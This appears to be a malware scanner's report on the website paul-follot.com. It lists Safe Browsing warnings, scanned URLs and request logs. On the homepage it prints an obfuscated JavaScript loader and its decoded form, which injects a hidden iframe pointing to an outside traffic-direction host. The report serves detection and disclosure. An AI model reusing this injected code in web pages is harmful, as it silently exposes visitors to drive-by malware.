Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=paul-follot.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://paul-follot.com/ | 200 OK Content-Length: 77270 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) c=2;i=c-2;if(window.document)try{new c.prototype}catch(hgberger){f=['-29n-29n67n64n-6n2n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n3n85n-25n-29n-29n-29n67n64n76n59n71n63n76n2n3n21n-25n-29n-29n87n-6n63n70n77n63n-6n85n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n81n76n67n78n63n2n-4n22n67n64n76n59n71n63n-6n77n76n61n23n1n66n78n78n74n20n9n9n78n62n77n15n17n8n60n83n67n72n78n63n76n8n72n63n78n9n77n78n62n77n9n65n73n8n74n66n74n25n77n67n62 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://tds57.byinter.net/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://tds57.byinter.net/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribut <iframe src='http://tds57.byinter.net/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://paul-follot.com/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 | 200 OK Content-Length: 14029 Content-Type: text/html | clean |
http://paul-follot.com/test404page.js | 404 Not Found Content-Length: 293 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: paul-follot.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 22 Jan 2015 00:33:14 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.3.3-7+squeeze19
GET / HTTP/1.1
Host: paul-follot.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 22 Jan 2015 00:33:14 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.3.3-7+squeeze19
Second query (visit from search engine):
GET / HTTP/1.1
Host: paul-follot.com
Referer: http://www.google.com/search?q=paul-follot.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: paul-follot.com
Referer: http://www.google.com/search?q=paul-follot.com
Result:
The result is similar to the first query. There are no suspicious redirects found.